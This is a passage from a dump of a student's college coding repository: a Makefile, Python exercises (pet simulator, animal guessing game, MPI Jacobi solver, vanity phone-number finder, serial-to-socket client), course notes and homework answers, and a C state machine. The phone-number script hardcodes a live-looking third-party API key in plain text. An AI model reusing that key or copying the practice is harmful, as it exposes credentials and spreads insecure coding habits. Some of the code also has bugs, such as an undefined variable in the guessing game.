10.833333015441895, "blob_id": "6291e7606c823645e08d1f4d5ac8919d6f2c962f", "content_id": "e8d7a59d8b8bbba4dba8de184fc33820c517bf93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 71, "license_type": "no_license", "max_line_length": 35, "num_lines": 6, "path": "/CSC 386 - Embedded Systems/structs-two/Makefile", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "all:\n\tgcc -o lrm linear-regression.c -lm\n\t\nclean:\n\trm -f lr\n\trm -f *.o\n" }, { "alpha_fraction": 0.5703364014625549, "alphanum_fraction": 0.574923574924469, "avg_line_length": 25.1200008392334, "blob_id": "69478441141d9fad10d8f506219084c26c5ad561", "content_id": "0344a09ea6dc7299b73e26322288d0e6463e9094", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 654, "license_type": "no_license", "max_line_length": 60, "num_lines": 25, "path": "/CSC 236 - Software Design/PetSimulator/food.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "import random\nclass Food():\n \"\"\" class to keep track of the diffrent types of food\"\"\"\n def __init__(self, name):\n self.name = name\n\n # Sets how much hunger a food takes away\n self.fillness = random.randint(1,30)\n\n def get_name(self):\n \"\"\" Returns the food's name\"\"\"\n return self.name\n\n def set_name(self, name):\n \"\"\"Sets the food's name \"\"\"\n self.name = name\n\n def get_fillness(self):\n \"\"\" Gets how much a food fills up a pet\"\"\"\n\n return self.fillness\n\n def set_fillness(self, fillness):\n \"\"\" Sets how much a food fills up a pet\"\"\"\n self.fillness = fillness\n\n" }, { "alpha_fraction": 0.5873192548751831, "alphanum_fraction": 0.5876900553703308, "avg_line_length": 31.493976593017578, "blob_id": "b56b953bc5140f57f60cf4317eb6f4b7ccac9d03", "content_id": "12720e800cdcbdd0a51b9d060c17e8bc9ebc4711", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2697, "license_type": "no_license", "max_line_length": 99, "num_lines": 83, "path": "/CSC 236 - Software Design/AnimalGuessingGame/guessing.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\"\n\n Created by Jesson Soto\n A guessing game that will learn based on questions provided by the user.\n\n\n\"\"\"\n\nimport json\n\ndef main():\n \"\"\"\n Opens a json file and imports it's logic to play the guessing game,\n Pre: None\n Post: A guess is provided and the program ends or starts over.\n \"\"\"\n\n # Aquire the logic file's path.\n file_path = raw_input(\"Where is the name of the logic file: \")\n logic_file = open(filename, \"rw\")\n\n # Create a json from the file.\n logic_tree = json.load(logic_file)\n\n # Play the guessing game.\n play_again = guess(logic_tree)\n\n # Repeat the game for as long as the user wants.\n while (play_again):\n play_again = guess(logic_tree)\n else:\n # On a completed game write out the new logic as a json onto some file.\n logic_file.close()\n logic_file = open(file_path, \"w\")\n\n # Make it look nice.\n logic_file.write(json.dumps(logic_tree, sort_keys=True, indent=4, separators = (',',': ')))\n logic_file.close()\n\ndef guess(head):\n \"\"\"\n Guesses the animal that the user is thinking of or enables them to add a question\n so that it could find it next time.\n Pre: Head - The top of the tree, or the start of the questions\n Post: A True or False indicating if the game should be repeated.\n \"\"\"\n\n # Takes a guess. This occures once the leaf nodes are reached. - Base\n if \"Guess\" in head:\n answer = raw_input(\"Is it a \" + head[\"Guess\"] + \": \")\n\n # On incorrect answer allow the user to add a question to later be used.\n if 'n' in answer.lower():\n\n # Get the approperate question and answer.\n correct_answer = raw_input(\"What was the animal: \")\n better_question = raw_input(\"What is one question that would identify the animal: \")\n incorrect_answer = head[\"Guess\"]\n\n # Insert the question with the guesses into the structure\n head[\"Question\"] = better_question\n head[\"Yes\"] = {\"Guess\": correct_answer}\n head[\"No\"] = {\"Guess\": incorrect_answer}\n\n # Remove the old leaf.\n del(head[\"Guess\"])\n\n # Prompt the player to play again\n answer = raw_input(\"Would you like to play again: \")\n if 'y' in answer.lower():\n return True\n else:\n return False\n else:\n # Ask the player a question to narrow down the choices.\n answer = raw_input(head[\"Question\"] + \": \")\n if 'y' in answer.lower():\n return guess(head[\"Yes\"]) # Recursive Case\n else:\n return guess(head[\"No\"]) # Recursive Case\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5037581324577332, "alphanum_fraction": 0.5185343623161316, "avg_line_length": 29.017948150634766, "blob_id": "87ee63698f970628a06d33878e6318126aabc9e4", "content_id": "6762f49c0027f42bcf57afadd180def3ea128218", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11708, "license_type": "no_license", "max_line_length": 126, "num_lines": 390, "path": "/CSC 486 - Parallel and Distributed Systems/sotoventuraj_dist.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\"\nJesson Soto\nJacobi\n\n\"\"\"\nfrom mpi4py import MPI\nimport os\n\ndef empty_matrix(source, headers):\n \"\"\"\n Generates an empty matrix based on source headers,\n size with the boundry rows already added.\n \"\"\"\n # Gererate empty list\n empty = list()\n\n # Added the top boundry row\n empty.append(source[0])\n\n # Determine row and column size\n rows = headers[0] - 1\n columns = headers[1] - 1\n\n # Populate the empty matrix\n for y in range(1, rows):\n temp_row = list()\n\n # Add the boundry left column\n temp_row.append(source[y][0])\n for x in range(1, columns):\n temp_row.append(None)\n\n # Add the boundry right column\n temp_row.append(source[y][-1])\n empty.append(temp_row)\n\n # Add bottom row\n empty.append(source[-1])\n return empty\n\ndef jacobi (source):\n \"\"\" Takes the values from the source and produces a new\n list of values that have had the Jacobi algorithms preformed\n on them.\n\n Args:\n source - The source list (2D), with only the data points.\n headers - A tuple of the x and y values\n\n Returns:\n A list containing the new values, the values are a mix of strings and ints.\n \"\"\"\n\n # Find the bounds\n max_rows = len(source)\n max_columns = len(source[0])\n if(max_rows == 2):\n return source\n result = empty_matrix(source, (max_rows, max_columns))\n max_rows -= 1\n max_columns -= 1\n # Create the first row.\n\n for y in range(1, max_rows):\n # Store the current jacobi values in a temp row\n for x in range(1, max_columns):\n result[y][x] = 0.25 * (long(source[y-1][x]) + long(source[y+1][x]) + long(source[y][x-1]) + long(source[y][x+1]))\n return result\n\ndef main():\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n size = comm.Get_size()\n\n # Used to house the 1D variant of the array\n jacobi_data_flat = list()\n # Used to house x and y\n headers = None\n\n # Open the file\n with open(\"test.in\", \"r\") as file:\n # Clean the data for later processing\n raw_data = file.read()\n raw_data = raw_data.replace(\"\\n\", \" \")\n raw_data = raw_data.replace(\"\\r\", \" \")\n raw_data = raw_data.replace(\" \", \" \")\n jacobi_data_flat = raw_data.split(\" \")\n\n # Strip out the headers\n headers = [int(jacobi_data_flat[0]), int(jacobi_data_flat[1])]\n og_header = (int(jacobi_data_flat[0]), int(jacobi_data_flat[1]))\n jacobi_data_flat = jacobi_data_flat[2:-1]\n # Conver the 1D list to a 2D list\n jacobi_data = roll_matrix(jacobi_data_flat, headers)\n\n # Preform a distributed Jacobi\n if size != 1:\n # Get the start and end headers for rank\n start, end = distribute(headers)\n headers[0] = abs(start-end)\n\n # Generate the first matrix along with an empty one\n results_1 = jacobi_data[start:end]\n data_size = len(jacobi_data)\n results_2 = empty_matrix(jacobi_data[start:end], headers)\n\n # Use tags to denote the top and bottom of the rows\n swap = True\n TOP_TAG = 10000\n BOTTOM_TAG = 000\n RECV_TAG = 30000\n\n # Preform 100 iterations of jacobi\n for i in range(100):\n # Specify the top and bottom rows\n top = None\n bottom = None\n\n # Determine the matrix to use based on swap\n if swap:\n results_2 = jacobi(results_1)\n top = results_2 [1]\n bottom = results_2 [-2]\n else:\n results_1 = jacobi(results_2)\n top = results_1[1]\n bottom = results_1[-2]\n\n # Preform send based on rank number and chunk the data\n if rank == 0:\n chunk_send(bottom, 1, TOP_TAG)\n bottom = chunk_recv(1, BOTTOM_TAG, data_size)\n elif rank == (size - 1):\n chunk_send(top, (rank-1), BOTTOM_TAG)\n top = chunk_recv((rank-1), TOP_TAG, data_size)\n else:\n chunk_send(top, (rank-1), BOTTOM_TAG)\n chunk_send(bottom, (rank+1), TOP_TAG)\n top = chunk_recv((rank-1), TOP_TAG, data_size)\n bottom = chunk_recv((rank+1), BOTTOM_TAG, data_size)\n\n # Update the matrix rows with the new boundries\n if swap:\n if rank != 0:\n results_2[0] = top\n if rank != (size - 1):\n results_2[-1] = bottom\n else:\n if rank != 0:\n results_1[0] = top\n if rank != (size - 1):\n results_1[-1] = bottom\n swap = not swap\n print(i)\n\n # Write out the data and concatinate\n if rank != 0 and rank != (size - 1):\n if swap:\n results_2 = results_2[1:-1]\n data = results_2\n else:\n results_1 = results_1[1:-1]\n data = results_1\n\n # Dump out row\n with open(\"Temp\" + str(rank), \"w\") as temp:\n for row in data:\n for index in row:\n temp.write(str(index) + \" \")\n temp.write(\"\\n\")\n comm.send(True, dest=0)\n\n elif rank == (size - 1):\n if swap:\n results_2 = results_2[1:]\n data = results_2\n else:\n results_1 = results_1[1:]\n data = results_1\n # Dump out row\n with open(\"Temp\" + str(rank), \"w\") as temp:\n for row in data:\n for index in row:\n temp.write(str(index) + \" \")\n temp.write(\"\\n\")\n comm.send(True, dest=0)\n else:\n # Concatinate the data\n data = None\n if swap:\n results_2 = results_2[0:-1]\n data = results_2\n else:\n results_1 = results_1[0:-1]\n data = results_1\n \n with open(\"Temp\" + str(rank), \"w\") as temp:\n temp.write(str(og_header[0]) + \" \")\n temp.write(str(og_header[1]) + \"\\n\")\n for row in data:\n for index in row:\n temp.write(str(index) + \" \")\n temp.write(\"\\n\")\n \n # Wait until all the other nodes are done\n for i in range(1, size):\n print ( comm.recv(source = i))\n\n # Use remove old data file\n os.system(\"rm data.out\")\n\n # Unify all the data files\n for i in range(size):\n os.system(\"cat Temp\" + str(i)+\" >> data.out\")\n\n # clear old files\n os.system(\"rm -f Temp*\")\n\n return\n\ndef chunk_send(source, dest, tag, chunk_size=100):\n \"\"\"\n Takes the source data and breaks it into\n chunks, to allow for larger data transfers.\n \n source - The source data\n dest - the destination\n tag - the tag to send\n chunk_size - chunk size\n \"\"\"\n comm = MPI.COMM_WORLD\n\n # Determine if chunking is needed\n if len(source) > chunk_size:\n\n # Determine chunk sizes\n send_count = len(source) // chunk_size\n send_remainder = len(source) % chunk_size\n\n # Send each chunk with a sequencial tag value\n for index in range(send_count):\n start = chunk_size * index\n end = chunk_size * (index+1)\n comm.send(source[start:end], dest=dest, tag=(tag+index))\n else:\n # For a remainder send that \n if send_remainder:\n start = len(source) - send_remainder\n comm.send(source[start:], dest=dest, tag=(tag+send_count))\n else:\n # No chunking needed\n comm.send(source, dest=dest, tag=tag)\n\ndef chunk_recv(source, tag, data_size, chunk_size=100):\n\n \"\"\"\n Recives chunked data and unifies it\n to allow for larger data transfers.\n \n source - The source data\n tag - the tag to send\n chunk_size - chunk size\n data_size - the size of the expected data\n \"\"\"\n comm = MPI.COMM_WORLD\n data = list()\n\n # Determine if the data was chunked\n if data_size > chunk_size:\n \n # Determine how many chunks are to be expected\n recv_count = data_size // chunk_size\n recv_remainder = data_size % chunk_size\n\n # Recive all the chunks and unify them in order\n for index in range(recv_count):\n data += comm.recv(source=source, tag=(tag+index))\n else:\n # Add the remaining chunks\n if recv_remainder:\n data += comm.recv(source=source, tag=(tag+recv_count))\n else:\n # No chunking needed\n data = comm.recv(source=source, tag=tag)\n # return data\n return data\n\ndef distribute(headers):\n\n \"\"\"\n Takes the headers and retuns \n a tuple defining the range of indexs that \n each node should operate on\n headers - the headers of the file\n \"\"\"\n\n # Establish variables \n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n size = comm.Get_size()\n file_size = headers[1]\n\n start = 0\n end = 0\n\n # Detemine the amount given to each node\n remainder = file_size % size\n spacing = file_size // size\n\n\n # print(spacing)\n # Do nothing if no remainder\n if remainder == 0:\n start = spacing*rank\n end = spacing*(rank+1)-1\n\n # Split based on the remainder to make sure no node has more than 1 or 2 extra rows\n elif rank < remainder:\n if rank == 0:\n start = spacing*rank\n end = spacing*(rank+1) + 2\n else:\n start = spacing *rank + rank - 1\n end = spacing *(rank+1) + rank + 2\n # print(\"ELSE!\", start,end)\n\n # There is a transition period between the remainders take this into account\n elif rank == remainder:\n start = spacing * rank + remainder - 1\n end = spacing *(rank+1) +remainder + 1\n # print(\"ELIF\", start,end)\n\n # The rest act as if no remainder occured except for the offest\n else:\n start = spacing * rank + remainder - 1\n end = spacing * (rank+1) + remainder+ 1\n # print(\"ELSE\", start,end)\n\n print(start, end, rank)\n return start, end\n\ndef write_data(data, headers):\n \"\"\" Writes out the Jacobi data\"\n\n Args:\n data - A 2D list containing the data\n headers - The size of the list\n\n Returns:\n Creates a file named Jacobi.out\n \"\"\"\n\n # Open a file\n with open(\"1024x1024.jacobi.out\", \"w\") as file:\n # Write out the headers\n file.write(str(headers[0]) + \" \")\n file.write(str(headers[1]) + \"\\n\")\n\n # Write out each row\n for row in data:\n for entry in row:\n file.write(str(entry) + \" \")\n else:\n file.write(\"\\n\")\n\ndef roll_matrix(flat, headers):\n \"\"\" Takes a 1D list and makes it 2D\n\n Args:\n flat - The 1D list\n headers - Tuple of x and y\n\n Returns:\n list of 2D source values\n \"\"\"\n\n # Empty list\n jacobi_data = list()\n\n # Strip out a rows worth of data and add it to the list\n for index in range(headers[1]):\n start = index * headers[1]\n end = ((index + 1) * headers[1])\n row_data = flat[start:end]\n for i in range(len(row_data)):\n row_data[i] = int(row_data[i])\n jacobi_data.append(row_data)\n return jacobi_data\n\nmain()\n\n" }, { "alpha_fraction": 0.7844982147216797, "alphanum_fraction": 0.7907705903053284, "avg_line_length": 92, "blob_id": "4a31de2c8fea3d53f12650a2214d6d525f348193", "content_id": "2bf5abc13a68ebcfce2b83624934a70b1b08bd7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2232, "license_type": "no_license", "max_line_length": 220, "num_lines": 24, "path": "/GSTR 410 - Indigenous Peoples/bias.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# Reading\n- When researching a group we can place more emphasis on acts that they do that are more similar to acts that we do. \n- Stereotypes are often taken into account when researching groups, leading to misguided information\n- When looking at groups certain people's experience can be preferred over another resulting in an slanted view of the group\n- As an outsider, interacting with the group can cause a change in their behavior\n- As an insider, assumptions that the group behaves as you were raised can cause more attention to be placed on similarities or differences.\n- The group being studied can be assumed to be a critical mass, when it is a actually many small groups\n- Appropriation of knowledge becomes an issue\n- Eurocentric views are seen as primary views while other views are relegated to secondary views.\n- The ethical space is an area where two cultures must be separated, but a small area exists for constructive talk about each of the cultures. \n- The ethical space is another way of saying cultural divide.\n# Inquiry\n- Not all biases are simple, in that we know that we have them. Some biases are implicit\n- These are formed from an early age and lead to judgment based on early childhood experiences. \n## https://www.ncbi.nlm.nih.gov/pmc/articles/PMC2917255/\n- Overcoming bias needs to be intentionally, and being aware of possible issues can help\n- Selecting certain people to interview can be handled by doing random samples\n- Knowing specifics about a group, say their health, race, or another piece that can directly influence the types of question that are being asked or they can cause a greater focus to be placed on the negative aspects. \n## https://hbr.org/2015/05/outsmart-your-own-biases\n- Relying heavily on system 1 senses (gut) can cause inaccurate results, as it is based on the bias that we developed. \n- Overcoming techniques include evaluating the result multiple times, and averaging your ideas.\n- Following your gut, but always looking back the result. If it was something bad, then asking why was it bad, and keeping that in mind for next time.\n- Ask someone on the outside to help you make choices and see if you are being blinded by bias.\n- Think about the possible alternatives.\n" }, { "alpha_fraction": 0.5483920574188232, "alphanum_fraction": 0.5568751692771912, "avg_line_length": 31.580402374267578, "blob_id": "41d661cd23d3c2d979b546ee91ba9fdef7572854", "content_id": "f5b12300ec607781cd96d174d0c1ad212bb46ba1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12967, "license_type": "no_license", "max_line_length": 205, "num_lines": 398, "path": "/CSC 236 - Software Design/Phonenumbers/application.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\"\nCreated by: Jesson Soto Ventura\nFinds all the mnemonics formed by a set of numbers\nA14\n\"\"\"\nimport json\nfrom urllib2 import Request, urlopen, URLError\n\n\ndef recursivemnemonics(word):\n \"\"\"\n Returns the next iteration on a word provided.\n Pre:\n A string that will be incremented\n Post:\n An incremented string along with an indicator of whether the cycle has been complemeted or not\n \"\"\"\n\n # Check the length of the word.\n # A word of length 1 is our base\n if len(word) != 1:\n\n # Get strip the first letter off the word and call itself\n stripped_word = word[1:]\n stripped_letter = word[0]\n\n # Increment the stripped_word\n is_end_of_cycle, next_word= recursivemnemonics(stripped_word)\n\n # Decide what to return\n if is_end_of_cycle:\n # For end of cycles incremented the first letter as well\n # Then return\n is_end_of_cycle, next_letter = get_next_letter(stripped_letter)\n return (is_end_of_cycle, next_letter + next_word)\n else:\n # Return only the incremented with the same first letter\n word = stripped_letter + next_word\n return (is_end_of_cycle, word)\n else:\n return get_next_letter(word)\n\ndef listmnemonics( word):\n \"\"\" Creates a list of the mnemonics returned by recursivemnemonics\n pre: A valid word to start the cycle with.\n post: A list of all the mnemonics formed from that word\n \"\"\"\n\n sequences = list()\n\n # Get the next sequence after the gwen word.\n is_end_of_cycle, next_sequence = recursivemnemonics(word)\n\n # Store the the sequence that follows it.\n sequences.append(next_sequence)\n\n # Continue storing the next sequence until the basecase has reached the end of its cycle\n while not is_end_of_cycle:\n is_end_of_cycle, next_sequence = recursivemnemonics(next_sequence)\n sequences.append(next_sequence)\n return(sequences)\n\n\ndef get_next_letter(letter):\n \"\"\" Returns the next letter in the cycle\n Parameters:\n letter - The letter to be advanced\n Pre:\n A single letter\n Post:\n A tuple indicating if the cycle started over along with the\n next letter in the cycle\n \"\"\"\n\n cycle = {\"A\":(False, \"B\"),\n \"B\":(False, \"C\"),\n \"C\":(True, \"A\"),\n \"D\":(False, \"E\"),\n \"E\":(False, \"F\"),\n \"F\":(True, \"D\"),\n \"G\":(False, \"H\"),\n \"H\":(False, \"I\"),\n \"I\":(True, \"G\"),\n \"J\":(False, \"K\"),\n \"K\":(False, \"L\"),\n \"L\":(True, \"J\"),\n \"M\":(False, \"N\"),\n \"N\":(False, \"O\"),\n \"O\":(True, \"M\"),\n \"P\":(False, \"Q\"),\n \"Q\":(False, \"R\"),\n \"R\":(False, \"S\"),\n \"S\":(True, \"P\"),\n \"T\":(False, \"U\"),\n \"U\":(False, \"V\"),\n \"V\":(True, \"T\"),\n \"W\":(False, \"X\"),\n \"X\":(False, \"Y\"),\n \"Y\":(False, \"Z\"),\n \"Z\":(True, \"W\"),\n }\n return cycle[letter]\n\ndef convert_number(number):\n \"\"\" Converts the given number to the first mnemonics\n Pre:\n A number as a string\n Post:\n The first mnemonic created with that string\n or invalid sequence if there is a 0 or 1 in the\n number.\n \"\"\"\n # The conversion between letters and number\n convert = {'2':\"A\", '3':\"D\", '4':\"G\",\n '5':\"J\", '6':\"M\", '7':\"P\",\n '8':\"T\", '9':\"W\"}\n word = str()\n\n # Step through all the numbers for any non valid number\n # return invalid sequence\n for digit in number:\n if digit in convert:\n word += convert[digit]\n else:\n return \"Invalid Sequence\"\n\n # Return the mnemonic\n return word\ndef convert_word(word):\n \"\"\" Converts the given number to the first mnemonics\n Pre:\n A number as a string\n Post:\n The first mnemonic created with that string\n or invalid sequence if there is a 0 or 1 in the\n number.\n \"\"\"\n # The conversion between letters and number\n convert = {'2':\"A\", '3':\"D\", '4':\"G\",\n '5':\"J\", '6':\"M\", '7':\"P\",\n '8':\"T\", '9':\"W\"}\n vanity_number = \"\"\n\n # Step through all the numbers for any non valid number\n # return invalid sequence\n for letter in word:\n if letter.lower() >= \"w\":\n vanity_number += \"9\"\n elif letter.lower() >= \"t\":\n vanity_number += \"8\"\n elif letter.lower() >= \"p\":\n vanity_number += \"7\"\n elif letter.lower() >= \"m\":\n vanity_number += \"6\"\n elif letter.lower() >= \"j\":\n vanity_number += \"5\"\n elif letter.lower() >= \"g\":\n vanity_number += \"4\"\n elif letter.lower() >= \"d\":\n vanity_number += \"3\"\n elif letter.lower() >= \"a\":\n vanity_number += \"2\"\n\n\n # Return the mnemonic\n return vanity_number\n\ndef main ():\n \"\"\" Displays all the mnemonics that can formed from a given number\n Pre:\n None\n Post:\n All the mnemonics that can be formed\n \"\"\"\n\n # Determine if the user wants a vanity_number made from thier current number or a new number\n print(\"Welcome to vanity phone finder!\")\n response = raw_input(\"Would you like to find vanity numbers for an existing number? Y o N \\n\")\n\n if 'y' in response.lower():\n # In case of yes\n phone_number = raw_input(\"Please enter a 10 digit phone number with # used in place of the vanity part of your phone number ex: 706####232\\n\")\n vanity = raw_input(\"Please enter the vanity part of your phone number as a number ex: 5646 \\n\")\n word = convert_number(vanity)\n\n # For a invalid sequence print invalid.\n if word != \"Invalid Sequence\":\n sequences = listmnemonics(word)\n sequences = get_valid_words(sequences)\n vanity_phone_number = fill_numbers(sequences, phone_number)\n print (\"These words were found in your number: \")\n for i in vanity_phone_number:\n print i\n else:\n print (\"Invalid Number\")\n else:\n # In case the user is looking to get a new number\n phone_number = raw_input(\"Please enter a 10 digit phone number with # used in place of the vanity part of your phone number and ? in place of any numbers you do not care about: ex: 706###233?\\n \" )\n vanity_word = raw_input(\"What vanity word would you like to have in your phone number: ex: TOO \\n \")\n if len(phone_number) != 10:\n print(\"Invalid Phone Number\")\n return None\n # Convert the word into a number\n word_num = convert_word(vanity_word)\n\n # Get unused variants of the number\n possible_vanity_numbers = get_vanity_numbers(phone_number, word_num)\n print (\"The following numbers appear to not have an owner and may be for sale:\")\n for i in possible_vanity_numbers:\n print i\n\n\n\ndef get_vanity_numbers(phone_number, vanity_word):\n \"\"\" Forms a list of all the possible vanity number combinations.\n Pre:\n A phone number with # in place of the vanity word and ? in place of useless numers.\n A vanity word\n Post:\n A list of valid vanity numbers\n \"\"\"\n\n # Variables\n split_start = 0\n split_end = 0\n start = True\n counter = 0\n question_count = -1\n sequences = list()\n sequences.append(vanity_word)\n valid_numbers = list()\n\n # Get the count of open numbers\n for number in phone_number:\n if number == \"?\":\n question_count += 1\n\n # Find where to splice the phone number\n for count, number in enumerate(phone_number):\n if number == \"?\" and start:\n split_start = count\n start = False\n elif number == \"?\" and not start:\n split_end = count\n\n # Take care of only one question mark\n if question_count != 0:\n\n # Iterate through all possible numbers\n while str(counter) <= (\"9\" * question_count):\n new_number = phone_number[:split_start] + str(counter) + phone_number[split_end + 1:]\n counter += 1\n # Fill in the # with the vanity number\n valid_numbers.append(fill_numbers(sequences, new_number))\n else:\n\n for value in range(9):\n # Replace the ? with numbers\n location = phone_number.index(\"?\")\n new_number = phone_number[:location] + str(value) + phone_number[location + 1:]\n\n # Fill in the # with the vanity number\n valid_numbers.append(fill_numbers(sequences, new_number))\n\n # ______________________________________ THIS ONE ____________\n # Check to see if the allowed number\n allowed = list()\n for number in valid_numbers:\n # Make a request to the api\n response = do_request(number)\n json_response = json.load(response)\n # See if the number belongs to anyone\n if len(json_response[\"belongs_to\"]) == 0:\n allowed.append(number)\n # ______________________________________ THIS ONE ____________\n\n return allowed\n\ndef do_request(number):\n \"\"\" Makes a request to the White Pages Pro api\n Pre:\n A phone number\n Post:\n The data given by the white pages api\n \"\"\"\n api_key = \"2dd11dab27a849448ce5699b6cbe9cc0\"\n url = \"https://proapi.whitepages.com/3.0/phone?phone={0}&api_key={1}\".format(number,api_key)\n request = Request(url)\n response = urlopen(request)\n return response\n\ndef fill_numbers(sequences, phone_number):\n \"\"\" Forms a list of all the possible vanity number combinations.\n Pre:\n A phone number with # in place of the vanity word.\n A vanity word\n Post:\n A list of valid vanity numbers\n \"\"\"\n\n # Variables\n split_start = 0\n split_end = 0\n start = True\n pound_count = 0\n\n # Count the number of #\n for number in phone_number:\n if number == \"#\":\n pound_count += 1\n # Handel the special case of 0\n if pound_count == 0:\n return sequences\n\n vanity_numbers = list()\n\n # Find out where to split the text\n for count, number in enumerate(phone_number):\n if number == \"#\" and start:\n split_start = count\n start = False\n elif number == \"#\" and not start:\n split_end = count\n\n # Replace the # in all the phone numbers with the vanity word\n for number in sequences:\n new_number = phone_number[:split_start] + number + phone_number[split_end + 1:]\n vanity_numbers.append(new_number)\n return vanity_numbers\n\n\ndef get_valid_words(all_words):\n \"\"\" Checks to see if the vanity words found are valid words\n Pre:\n A list of all the owrds found\n Post:\n A list of valid words\n \"\"\"\n\n # Open relativent files\n word_file = open(\"valid_words.txt\", \"rw\")\n seek_positions = open(\"seek_positions.json\", \"rw\")\n valid_words = list()\n\n # Create a json from the file.\n word_locations = json.load(seek_positions)\n current_letter = all_words[0]\n found_word = \"\"\n\n # Loop through all the words\n while len(all_words) > 0:\n\n # Checks to see if the word is in the dictonary\n test_word = all_words[0].lower()\n\n # Removes none real words\n if test_word[0] != current_letter:\n current_letter = test_word[0]\n start_position = word_locations[current_letter]\n word_file.seek(start_position)\n else:\n # increments counter based on word\n # Go to next word if the test word is greater\n # change seek position if its less\n # add if its equal to the current word\n if found_word > test_word:\n all_words.remove(all_words[0])\n elif test_word == found_word:\n valid_words.append(test_word)\n all_words.remove(all_words[0])\n elif found_word < test_word:\n found_word = word_file.readline().lower()[:-2]\n\n return valid_words\n\ndef get_letter_locations():\n word_locations = open(\"seek_positions.json\", \"w\")\n word_file = open(\"valid_words.txt\", \"rb\")\n locations = dict()\n current_letter = \"a\"\n counter = 0\n for line in word_file:\n\n if current_letter == line[0].lower():\n locations[current_letter] = counter\n current_letter = chr(ord(current_letter) + 1)\n\n counter += len(line)\n\n for key in locations:\n word_file.seek(locations[key])\n line = word_file.readline()\n print(line,key)\n\n word_locations.write(json.dumps(locations, sort_keys=True, indent=4, separators = (',',': ')))\n\n\nmain()\n" }, { "alpha_fraction": 0.7007692456245422, "alphanum_fraction": 0.7792307734489441, "avg_line_length": 67.36842346191406, "blob_id": "324810484f9b47c183d145be75d4e7d7a1bd7b3b", "content_id": "ebaaa1159c830cf0f925bfd3590d2b0cafede12d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1300, "license_type": "no_license", "max_line_length": 599, "num_lines": 19, "path": "/MAT 433 - Numberical Analysis/HW_5/hw.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# 1 \nA. 0.56720\nB. 0.73911\nC. 1.2926\nD. 1.3029\n\n# 2\nA. 0.56717\nB. 0.73812 \nC. 1.2927\nD. 1.3030\n\n# 3 \nA. 0.706914901733398\nB. 0.706913117192053\nC. Both methods converge to a value near 0.79691 although the value given by the secant method gives a more accurate representation of the zero for the function. As for performance of the secant method has 19 iterations while the bisection method has 17 iterations. This can be explained by the steep slopes near the zero. As a result of the steep slope, the secant method is required to get closer to the zero otherwise, the slight inaccuracy is amplified. Had the equation had a less steeper slope the secant method would have been more efficient. \n\n# 4\nThe bisect method was the most efficient with only 3 iterations, while the secant method had 7 iterations. The result of the calculation on the bisect method were also closer, as the bisect method gave a value of 1.2438, while the secant method gave 1.3837. In both performance the result of the bisect method was more desired. The secant method is not preferred on account of the shape of the graph, since the graph has a near linear slope near the zero. This near zero linear slope, means that the resulting value from the equation is near the stopping criteria, zero, but far away from the zero. \n" }, { "alpha_fraction": 0.5845012068748474, "alphanum_fraction": 0.605111300945282, "avg_line_length": 30.05128288269043, "blob_id": "12bc1377627a3234d8b0478bc81e9fdf6359b77a", "content_id": "933a833083acfbc60ad99a7d43caccd337343d1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1213, "license_type": "no_license", "max_line_length": 86, "num_lines": 39, "path": "/CSC 386 - Embedded Systems/RC-Nespi/client.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "import serial\nimport socket\n\ndef read_controller(location):\n ''' Reads the input of the controller and sends the data over the\n network to the raspberry pi.\n '''\n\n # Establish a connection.\n port = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # ip = input(\"IP: \")\n ip = \"192.168.0.100\"\n port_number = 8898\n port.connect((ip, port_number))\n reader = serial.Serial(location,115200,timeout=1)\n while True:\n # Remove the useless characters being read.\n reading = str(reader.readline()).split(\"'\")\n reading = reading[1]\n reading = reading[:-4]\n\n # Only transmit on an input.\n if len(reading) > 0:\n # Convert the string being read into an int and read it as a binary value.\n reading = int(reading,2)\n # Print out the readings\n print(reading)\n # Encode the data to be transmitted.\n encoded_reading = str(reading).encode()\n # Transmit it over the net.\n port.sendall(encoded_reading)\n\n\n\n\n# Determine the serial location that will be used to read the file.\nif __name__ == \"__main__\":\n location = input(\"Serial: \")\n read_controller(location)\n\n\n" }, { "alpha_fraction": 0.5429362654685974, "alphanum_fraction": 0.5678670406341553, "avg_line_length": 19.628570556640625, "blob_id": "059b6193f34422ebab3c2a385cc00d3554163531", "content_id": "867ba05925c3049829c4dfc482245ab43887733a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 722, "license_type": "no_license", "max_line_length": 51, "num_lines": 35, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_2/counter.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdbool.h>\n#include <unistd.h>\n#include <ctype.h>\n\n#define SLEEPING 0\n#define READING 1\n\nint main(int argc, char* argv[]){\n // Prints out Reading after every 100000 cycles\n int counter = 0;\n int state = SLEEPING;\n do{\n switch(state){\n case SLEEPING:\n // Increment the counter\n counter += 1;\n\n // Check if its ready to switch states\n if (counter == 100000){\n state = READING;\n }\n break;\n case READING:\n // Reset the state back to the inital state\n state = SLEEPING;\n counter = 0;\n // Print Reading\n printf(\"READING\\n\");\n break;\n }\n 